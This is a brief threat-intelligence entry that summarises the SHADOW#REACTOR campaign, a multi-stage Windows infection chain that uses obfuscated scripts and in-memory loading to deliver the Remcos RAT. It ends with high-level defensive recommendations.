SHADOW#REACTOR – Text-Only Staging, .NET Reactor, and In-Memory Remcos RAT Deployments
Essential information
- Published
- 13/01/2026 16:17
- Modified
- 13/01/2026 16:31
- Tags
- .net reactor 2026-01-13 in-memory execution living-off-the-land binaries msbuild abuse obfuscation powershell reflective loading remcos rat text-only staging vbs
- Related entities
- 12 observables, 8 techniques (mitre), 1 malware
Description
This analysis examines a multi-stage Windows malware campaign called SHADOW#REACTOR. The infection chain uses obfuscated VBS, PowerShell downloaders, and text-based payloads to deliver a Remcos RAT backdoor. Key features include fragmented text staging, .NET Reactor protection, reflective loading, and MSBuild abuse as a living-off-the-land binary. The campaign leverages complex obfuscation and in-memory execution to evade detection while establishing persistent remote access. Defensive recommendations focus on script execution monitoring, LOLBin abuse detection, and enhanced PowerShell logging to counter the sophisticated evasion techniques employed.